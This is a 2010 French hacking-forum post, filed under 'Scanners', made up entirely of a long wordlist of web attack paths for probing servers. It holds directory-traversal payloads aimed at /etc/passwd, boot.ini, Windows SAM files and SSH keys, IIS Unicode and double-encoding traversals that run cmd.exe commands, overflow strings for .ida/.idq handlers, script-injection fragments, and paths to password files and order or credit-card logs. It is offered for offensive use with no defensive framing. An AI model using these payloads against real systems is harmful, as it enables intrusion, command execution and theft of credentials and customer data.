Dark Angel Index du Forum
Dark Angel
Hacking and Reverse
 
Dark Angel Index du ForumFAQRechercherS’enregistrerConnexion

:: CGIs ::

 
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> Scanners
Sujet précédent :: Sujet suivant  
Auteur Message
Mass Trauma
Membre
Membre

Hors ligne

Inscrit le: 21 Nov 2009
Messages: 96

MessagePosté le: Mer 6 Jan - 16:19 (2010)    Sujet du message: CGIs Répondre en citant

%20%
%20%20%
%20%20%20%
%20%20%20%20%
%20%20%20%20%20%
%20%20%20%20%20%20%
%20%20%20%20%20%20%20%
%20%20%20%20%20%20%20%20%
%20%20%20%20%20%20%20%20%20%
%20%20%20%20%20%20%20%20%20%20%
%20%20%20%20%20%20%20%20%20%20%20%
%20%20%20%20%20%20%20%20%20%20%20%20%
%20%20%20%20%20%20%20%20%20%20%20%20%20%
%2E%2E%2F%2E%2E%2F
%2F%2E%2E%2F%2E%2E%2F
../..
../../boot.ini
./winnt/system32/cmd.exe?/c+dir/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/
/%00
/%00/
/%0a%0a
/%22%3cscript%3e
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/motd
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e/
/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
/%2f..%2f..%2f../
/%2f/
/%3c/a%3e%3cscript%3e
/%3c/title%3e%3c
/%3f.jsp
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
/%5c/
/%63%67%69%2d%62%69%6e/%74%65%73%74%2d%63%67%69
/%77s_ftp.ini
/%a%s%p%d
/&lt
/*.*
/."./."./winnt/win.ini%20.php3
/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._
/..%255c..%255../
/..%255c..%255/
/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._
/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._
/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
/...................../config.sys         
/..................../boot.ini            
/.................../boot.ini             
/................../boot.ini              
/................../config.sys
/................../etc/passwd
/................./boot.ini               
/................/boot.ini                
/.............../boot.ini                 
/............../boot.ini                  
/............./boot.ini                   
/............/boot.ini                    
/.........../boot.ini                     
/........../boot.ini                      
/........./boot.ini                       
/......../
/......../boot.ini                        
/......../|/........./
/......./boot.ini                         
/....../autoexec.bat
/....../boot.ini                          
/...../boot.ini                           
/..../Windows/Admin.pwl
/..../boot.ini                            
/..../config.sys
/.../
/.../.../
/.../.../.../
/.../.../.../.../
/.../.../.../.../.../
/.../.../.../.../.../.../
/.../.../.../.../.../.../.../
/.../.../.../.../.../.../.../.../
/.../.../.../.../.../.../.../.../.../
/.../.../.../.../.../.../.../.../.../.../
/.../.../.../.../.../.../.../.../.../boot.ini
/.../boot.ini                             
/../
/../../
/../../../
/../../../../
/../../../../../
/../../../../../../
/../../../../../../../
/../../../../../../../../
/../../../../../../../../../
/../../../../../../../../../../
/../../../../../../../../../../../
/../../../../../../../../../../../../
/../../../../../../../../../../../../../
/../../../../../../../../../../etc/passwd
/../../../../../../../../../boot.ini
/../../../../../../../../boot.ini
/../../../../../../../boot.ini
/../../../../../../Scandisk.log
/../../../../../../boot.ini
/../../../../../boot.ini
/../../../../../etc/passwd
/../../../../../winnt/repair/sam._
/../../../../boot.ini
/../../../../config.sys
/../../../../etc/passwd
/../../../../winnt/repair/sam._
/../../../autoexec.bat
/../../../boot.ini
/../../../etc/passwd
/../../../scandisk.log
/../../boot.ini
/../../config.sys
/../../etc/passwd
/../../passwd
/../../shadow
/../../windows/user.dat
/../../winnt/win.ini
/../boot.ini                              
/../root/
/..\
/..\..\..\..\..\..\autoexec.bat
/..\..\..\..\..\..\temp\temp.class
/..\..\..\..\..\autoexec.bat
/..\..\..\..\autoexec.bat
/..\..\..\autoexec.bat
/..\..\..\winnt\repair\sam._
/..\..\autoexec.bat
/..\/..\
/..\/..\/..\
/..\/..\/..\/..\
/..\/..\/..\/..\/..\
/..\/..\/..\/..\/..\/..\
/..\/..\/..\/..\/..\/..\/..\
/..\/..\/..\/..\/..\/..\/..\/..\
/..\/..\/..\/..\/..\/..\/..\/..\/..\
/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\
/..\\..\\..\\..\\..\\..\\..\\boot.ini
/..\\..\\..\\..\\..\\..\autoexec.bat
/..\\..\\..\winnt\repair\sam._
/./
/./cgi-bin//test%20cgi
/.DS_Store
/.FBCIndex
/.\/./cg%69-bin/./test%20cgi
/.access
/.addressbook
/.aspx
/.bash_history
/.bashrc
/.cfm
/.cobalt/sysManage/../admin/.htaccess
/.forward
/.history
/.htaccess
/.htaccess/
/.html/............../config.sys
/.htpasswd
/.htpasswd/
/.jpilot/
/.jsp
/.jsp/WEB-INF/classes/Env.java
/.lynx_cookies
/.nsconfig
/.nsf/../winnt/win.ini
/.passwd
/.perf
/.pinerc
/.plan
/.printer
/.proclog
/.procmailrc
/.profile
/.rhosts
/.sh_history
/.shtm
/.shtml
/.ssh
/.ssh/authorized_keys
/.ssh/known_hosts
/.stm
/.thtml
/.www_acl
/.wwwacl
//
//.jsp/WEB-INF/classes/Env.java
////./../.../boot.ini
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
///_vti_inf.html
///etc/hosts
///etc/passwd
//Scripts/tools
//WEB-INF/
//a.idq?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
/666%0a%0a666.jsp
/852566C90012664F
/?D=A
/?M=A
/?N=D
/?Open
/?OpenServer
/?PageServices
/?S=A
/?\
/?sql_debug=1
/?wp-cs-dump
/?wp-cs-dump             
/?wp-html-rend           
/?wp-start-ver           
/?wp-stop-ver            
/?wp-uncheckout          
/?wp-usr-prop            
/?wp-ver-diff            
/?wp-ver-info            
/?wp-verify-link         
/ASP/cart/database/metacart.mdb
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/Admin/
/Admin_files/
/Admin_files/order.log
/Administration/
/AdvWorks/equipment/catalog_type.asp
/AdvWorks/equipment/catalog_type.asp
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/CFIDE/Administrator/startstop.html
/CFIDE/administrator/index.cfm
/COM
/Config1.htm
/ConsoleHelp/login.jsp
/Count.cgi
/DB4Web/10.10.10.10:100
/DEASAppDesign.nsf
/DEASLog.nsf
/DEASLog01.nsf
/DEASLog02.nsf
/DEASLog03.nsf
/DEASLog04.nsf
/DEASLog05.nsf
/DEESAdmin.nsf
/DMR/
/DataBase/
/GW5/GWWEB.EXE?HELP=bad-request
/GWWEB.EXE?HELP=bad-request
/GetFile.cfm
/HyperStat/stat_what.log
/IISADMPWD/achg.htr
/IISADMPWD/aexp.htr
/IISADMPWD/aexp2.htr
/IISADMPWD/aexp2b.htr
/IISADMPWD/aexp3.htr
/IISADMPWD/aexp4.htr
/IISADMPWD/aexp4b.htr
/IISADMPWD/anot.htr
/IISADMPWD/anot3.htr
/ISSamples/SQLQHit.asp
/ISSamples/sqlqhit.asp
/JUNK(10)
/JUNK(10)abcd.html
/JUNK(223)
/Jigsaw/
/LOGIN.PWD
/MIDICART/midicart.mdb
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/root.exe
/MSADC/root.exe?/c+dir
/MSADC/root.exe?/c+dir
/MWS/HandleSearch.html?searchTarget=test&B1=Submit
/NULL.printer
/NetDetector/middle_help_intro.htm
/Newuser?Image=../../database/rbsserv.mdb
/Orders/order_log.dat
/Orders/order_log_v12.dat
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/PBServer/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/PBServer/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/PBServer/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
/PBServer/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/PBServer/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
/PBServer/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
/PBServer/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
/PBServer/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
/PDG_Cart/
/PDG_Cart/oder.log
/PDG_Cart/order.log
/PDG_Cart/shopper.conf
/PSUser/PSCOErrPage.htm
/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
/Proxy/LoginResponse
/ROADS/cgi-bin/search.pl
/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/Rpc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/Rpc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/Rpc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
/Rpc/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/Rpc/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
/Rpc/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
/Rpc/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
/Rpc/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
/SQLQHit.asp
/SUNWmc/htdocs/
/Scripts  
/Scripts/samples
/Scripts/tools
/SetSecurity.shm
/SilverStream
/SilverStream/Meta/Tables/?access-mode=text
/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
/SiteScope/htdocs/SiteScope.html
/SiteServer/Admin/commerce/foundation/DSN.asp
/SiteServer/Admin/commerce/foundation/domain.asp
/SiteServer/Admin/commerce/foundation/driver.asp
/SiteServer/Admin/knowledge/dsmgr/default.asp
/SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
/SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
/SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
/SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
/SiteServer/Admin/knowledge/persmbr/vs.asp
/SiteServer/Knowledge/Default.asp?ctr=\
/SiteServer/Publishing/
/SiteServer/Publishing/ViewCode.asp
/SiteServer/admin/
/SiteServer/admin/findvserver.asp
/Sites/Knowledge/
/Sites/Knowledge/Membership/Inspired/ViewCode.asp
/Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
/Sites/Samples/
/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
/Sites/Samples/Knowledge/Push/ViewCode.asp
/Sites/Samples/Knowledge/Search/ViewCode.asp
/Stats/
/StoreDB/
/Survey/Survey.Htm
/USER/CONFIG.AP
/WEB-INF./web.xml
/WEB-INF/
/WEBAGENT/CQMGSERV/CF-SINFO.TPF
/WSFTP.LOG
/WS_FTP.ini
/WWWROOT/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winnt/system32/cmd.exe?/c+dir
/WWWROOT/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir
/WWWROOT/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf/winnt/system32/cmd.exe?/c+dir
/WWWROOT/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c/winnt/system32/cmd.exe?/c+dir
/WWWROOT/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s/winnt/system32/cmd.exe?/c+dir
/WWWROOT/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir
/WWWROOT/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af/winnt/system32/cmd.exe?/c+dir
/WWWROOT/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc/winnt/system32/cmd.exe?/c+dir
/WWWROOT/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af/winnt/system32/cmd.exe?/c+dir
/WWWROOT/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af/winnt/system32/cmd.exe?/c+dir
/WebSTART%20LOG
/WebShop/
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/WebSphereSamples
/WebTrend/
/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
/Web_store/
/XSQLConfig.xml
/[SecCheck]/..%252f..%252f../ext.ini
/[SecCheck]/..%255c..%255c../ext.ini
/[SecCheck]/..%2f../ext.ini
/\
/\../boot.ini
/\../config.sys
/\../readme.txt
/\\../readme.txt
/_cti_pvt/
/_mem_bin/
/_mem_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/_mem_bin/FormsLogin.asp
/_mem_bin/auoconfig.asp
/_mem_bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/_mem_bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
/_mem_bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
/_mem_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
/_mem_bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
/_mem_bin/formslogin.asp?\
/_mem_bin/remind.asp
/_private
/_private/
/_private/_vti_cnf/
/_private/form_results.htm
/_private/form_results.html
/_private/form_results.txt
/_private/orders.htm
/_private/orders.html
/_private/orders.txt
/_private/register.htm
/_private/register.html
/_private/register.txt
/_private/registrations.htm
/_private/registrations.txt
/_private/shopping_cart.mdb
/_public/
/_vti_adm/admin.dll
/_vti_bin
/_vti_bin
/_vti_bin/
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_bin/CGImail.exe
/_vti_bin/_vit_aut/fp30reg.dll
/_vti_bin/_vti_adm
/_vti_bin/_vti_adm
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_aut
/_vti_bin/_vti_aut
/_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
/_vti_bin/_vti_aut/author.exe
/_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/_vti_aut/fp30reg.dll
/_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
/_vti_bin/_vti_aut/fp4areg.dll
/_vti_bin/_vti_cnf/
/_vti_bin/admin.pl
/_vti_bin/cfgwiz.exe
/_vti_bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/_vti_bin/contents.htm
/_vti_bin/fpadmin.htm
/_vti_bin/fpcount.exe
/_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1
/_vti_bin/fpremadm.exe
/_vti_bin/fpsrvadm.exe
/_vti_bin/owssvr.dll
/_vti_bin/shtml.dll
/_vti_bin/shtml.dll/_vti_rpc
/_vti_bin/shtml.dll/_vti_rpc
/_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
/_vti_bin/shtml.dll/nosuch.htm
/_vti_bin/shtml.exe
/_vti_bin/shtml.exe/_vti_rpc
/_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
/_vti_bin/shtml.exe/junk_nonexistant.exe
/_vti_bin/tpstub.exe
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_cnf/_vti_cnf/
/_vti_cnf/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/_vti_inf.html
/_vti_log
/_vti_log/
/_vti_log/_vti_cnf/
/_vti_pvt
/_vti_pvt/access.cnf
/_vti_pvt/admin.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/linkinfo.cnf
/_vti_pvt/service.cnf
/_vti_pvt/service.pwd
/_vti_pvt/service.stp
/_vti_pvt/services.cnf
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/svacl.cnf
/_vti_pvt/svcacl.cnf
/_vti_pvt/users.pwd
/_vti_pvt/writeto.cnf
/_vti_pwd/administrators.pwd
/_vti_txt
/_vti_txt/
/_vti_txt/_vti_cnf/
/a%5c.aspx
/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
/a.ida?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
/a.idq?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
/a.jsp/
/a.jsp//..//..//..//..//..//../winnt/win.ini
/a/
/a?
/a_domlog.nsf
/a_security.htm
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/
/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar
/ab2/@AdminViewError
/accept/
/access-log
/access.log
/access/
/account.nsf
/account/
/accounting/
/accounts.nsf
/accounts/getuserdesc.asp
/achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
/acid/
/acid/acid_main.php
/active.log
/add.php
/add.php3?url=ja&adurl=
/add_user.php
/addressbook.php?\
/addyoursite.php?catid=&lt
/admcgi/contents.htm
/admcgi/scripts/Fpadmcgi.exe
/admentor/adminadmin.asp
/admin-serv/config/admpw
/admin-serv/config/admpw
/admin.cgi
/admin.htm
/admin.html
/admin.nsf
/admin.php
/admin.php3
/admin.php3?admin=anything
/admin.php4?reg_login=1
/admin.php?en_log_id=0&action=config
/admin.php?en_log_id=0&action=users
/admin.shtml
/admin/
/admin/admin_phpinfo.php4
/admin/adminproc.asp
/admin/browse.asp?FilePath=c:\&Opt=2&level=0
/admin/contextAdmin/contextAdmin.html
/admin/cplogfile.log
/admin/datasource.asp
/admin/login.php?action=insert&username=test&password=test
/admin/login.php?path=\
/admin/phpinfo.php
/admin4.nsf
/admin5.nsf
/administration/
/administrator/
/adminlogin?RCpage=/sysadmin/index.stm
/admisapi/
/admisapi/fpadmin.htm
/adpassword.txt
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir
/adsamples/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
